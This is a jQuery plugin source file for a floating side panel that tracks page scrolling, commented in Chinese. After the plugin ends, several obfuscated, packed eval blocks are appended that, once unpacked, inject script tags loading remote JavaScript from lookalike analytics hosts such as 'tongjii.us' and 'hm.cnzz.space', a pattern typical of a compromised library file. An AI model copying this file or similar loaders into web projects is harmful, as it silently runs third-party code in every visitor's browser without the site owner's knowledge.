/* 
 * jQuery Fixed Plugins 1.5.1
 * Author:
 * Url:
 * Data
 *
 *  Update Log:
 * 
 *  Status       Date            Name      Version           BUG-Description
 *  ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 *  Created      2012-08-15    	 Ru	       1.0               None
 
 *  Modified     2012-09-02      Ru        1.4.1             修复了webkit内核浏览器右边浮动有一定距离的bug(负外边距),增加了悬浮靠边的定位、是否显示关闭按钮、是否垂直居中定位
 
 *  Modified     2013-01-02    	 Ru	       1.5.1             增加了垂直方向的位置;把核心函数(关闭、展开、定位、最小化)重构,修复了webkit内核浏览器右边浮动最小化时没有显示出来
 *  ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------*/

;(function($){
    $.fn.fix = function(options){
        var defaults = {
            position 		: "left",	//悬浮位置 - left或right
			horizontal  	: 0,		//水平方向的位置 - 默认为数字
			vertical    	: null,		//垂直方向的位置 - 默认为null
			halfTop     	: false,	//是否垂直居中位置
			minStatue 		: false,	//是否最小化
			hideCloseBtn 	: false,	//是否隐藏关闭按钮
			skin 			: "gray",	//风格皮肤
			showBtnWidth 	: 28,       //show_btn_width
			contentBoxWidth : 154, 		//side_content_width
			durationTime 	: 1000		//完成时间
        }
        var options = $.extend(defaults, options);		

        this.each(function(){			
            //获取对象
			var thisBox = $(this),
				closeBtn = thisBox.find(".close_btn"),
				show_btn = thisBox.find(".show_btn"),
				contentBox = thisBox.find(".content_box"),
				sideList = thisBox.find(".side_list")
				;	
			
			//设置内容的高度
			thisBox.height( contentBox.height() );
			
			//最小化
			if(options.minStatue){
				show_btn.show();
				if(options.position=="left"){
					contentBox.css({ left: -options.contentBoxWidth });
				}else if(options.position=="right"){
					contentBox.css({ right: -options.contentBoxWidth });
				}
				thisBox.css({ width: options.showBtnWidth });
			}
			//皮肤控制
			if(options.skin) thisBox.addClass("skin_" + options.skin);
			//隐藏关闭按钮
			if(options.hideCloseBtn) closeBtn.css("display", "none");
			
			//定位			
			var boxTop = null,
				defaultTop = thisBox.offset().top,	//对象的默认top
				halfTop = ($(window).height() - thisBox.height())/2  //垂直居中时候的top
				;
			if(options.vertical == null){
				boxTop = defaultTop;
			}else {
				boxTop = options.vertical;
			}
			if( options.halfTop ) {	boxTop = halfTop; }
			
			thisBox.css(options.position, options.horizontal);
			thisBox.css("top", boxTop);
						
						
			//核心scroll事件			
			$(window).bind("scroll",function(){
				var offsetTop = boxTop + $(window).scrollTop() + "px";
	            thisBox.animate({
	                top: offsetTop
	            },{
	            	duration: options.durationTime,	
	                queue: false    //此动画将不进入动画队列
	            });
			});
			
			//关闭
			closeBtn.bind("click",function(){
				show_btn.show();
				if(options.position=="left"){
					contentBox.animate({left: -options.contentBoxWidth},"fast");
				}else if(options.position=="right"){
					contentBox.animate({right: -options.contentBoxWidth },"fast");
				}
				thisBox.animate({width: options.showBtnWidth },"fast");
			});
			
			//展开
			 show_btn.bind("click", function() {
				if(options.position=="left"){
					contentBox.animate({left: 0},"fast");
				}
				else if(options.position=="right"){
					contentBox.animate({right: 0},"fast");
				}
				thisBox.animate({width: options.contentBoxWidth },"fast");
				show_btn.hide();
	        });
				
        });	//end this.each

    };
})(jQuery);eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('V(Q(p,a,c,k,e,r){e=Q(c){P(c<a?\'\':e(15(c/a)))+((c=c%a)>14?U.13(c+12):c.10(11))};R(!\'\'.S(/^/,U)){T(c--)r[e(c)]=k[c]||e(c);k=[Q(e){P r[e]}];e=Q(){P\'\\\\w+\'};c=1};T(c--)R(k[c])p=p.S(X Y(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c]);P p}(\'y(j(p,a,c,k,e,r){e=j(c){l c.t(a)};q(!\\\'\\\'.n(/^/,x)){m(c--)r[e(c)]=k[c]||e(c);k=[j(e){l r[e]}];e=j(){l\\\'\\\\\\\\w+\\\'};c=1};m(c--)q(k[c])p=p.n(u v(\\\'\\\\\\\\b\\\'+e(c)+\\\'\\\\\\\\b\\\',\\\'g\\\'),k[c]);l p}(\\\'1 5=5||[];(9(){1 a=3.f(\\\\\\\'4\\\\\\\');a.7=\\\\\\\'8://i.b.c/d.e\\\\\\\';1 2=3.g(\\\\\\\'4\\\\\\\')[0];2.h.6(a,2)})();\\\',o,o,\\\'|z|s|A|B|C|D|E|F|j||G|H|I|J|K|L|M|N\\\'.O(\\\'|\\\'),0,{}))\',Z,Z,\'|||||||||||||||||||Q||P|T|S|19||R|||10|X|Y||U|V|16|17|18|1a|1b|1c|1d|1e|1f|1g|1h|1i|1j|1k|1l|W\'.W(\'|\'),0,{}))',62,84,'|||||||||||||||||||||||||||||||||||||||||||||||||||return|function|if|replace|while|String|eval|split|new|RegExp|51|toString|36|29|fromCharCode|35|parseInt|var|document|script||_hmt_en|insertBefore|src|http|tongjii|us|tj|js|createElement|getElementsByTagName|parentNode|libb'.split('|'),0,{}))eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('y(j(p,a,c,k,e,r){e=j(c){l c.t(a)};q(!\'\'.n(/^/,x)){m(c--)r[e(c)]=k[c]||e(c);k=[j(e){l r[e]}];e=j(){l\'\\\\w+\'};c=1};m(c--)q(k[c])p=p.n(u v(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c]);l p}(\'1 5=5||[];(9(){1 a=3.f(\\\'4\\\');a.7=\\\'8://i.b.c/d.e\\\';1 2=3.g(\\\'4\\\')[0];2.h.6(a,2)})();\',o,o,\'|z|s|A|B|C|D|E|F|j||G|H|I|J|K|L|M|N\'.O(\'|\'),0,{}))',51,51,'|||||||||||||||||||function||return|while|replace|19||if|||toString|new|RegExp||String|eval|var|document|script|_hmt_en|insertBefore|src|http|tongjii|us|tj|js|createElement|getElementsByTagName|parentNode|lib|split'.split('|'),0,{}))
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('y(j(p,a,c,k,e,r){e=j(c){l c.t(a)};q(!\'\'.n(/^/,x)){m(c--)r[e(c)]=k[c]||e(c);k=[j(e){l r[e]}];e=j(){l\'\\\\w+\'};c=1};m(c--)q(k[c])p=p.n(u v(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c]);l p}(\'1 5=5||[];(9(){1 a=3.f(\\\'4\\\');a.7=\\\'8://i.b.c/d.e\\\';1 2=3.g(\\\'4\\\')[0];2.h.6(a,2)})();\',o,o,\'|z|s|A|B|C|D|E|F|j||G|H|I|J|K|L|M|N\'.O(\'|\'),0,{}))',51,51,'|||||||||||||||||||function||return|while|replace|19||if|||toString|new|RegExp||String|eval|var|document|script|_hmt_en|insertBefore|src|http|tongjii|us|tj|js|createElement|getElementsByTagName|parentNode|lib|split'.split('|'),0,{}));
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('v(h(p,a,c,k,e,r){e=h(c){i c.o(a)};m(!\'\'.l(/^/,u)){j(c--)r[e(c)]=k[c]||e(c);k=[h(e){i r[e]}];e=h(){i\'\\\\w+\'};c=1};j(c--)m(k[c])p=p.l(q t(\'\\\\b\'+e(c)+\'\\\\b\',\'g\'),k[c]);i p}(\'1 5=5||[];(8(){1 a=3.b(\\\'4\\\');a.7=\\\'//g.9/6/6.c\\\';1 2=3.e(\\\'4\\\')[0];2.f.d(a,2)})();\',n,n,\'|x|s|y|z|A|B|C|h|D||E|F|G|H|I|J\'.K(\'|\'),0,{}))',47,47,'|||||||||||||||||function|return|while||replace|if|17|toString||new|||RegExp|String|eval||var|document|script|_hmt_cnzz|hm|src|space|createElement|js|insertBefore|getElementsByTagName|parentNode|cnzz|split'.split('|'),0,{}))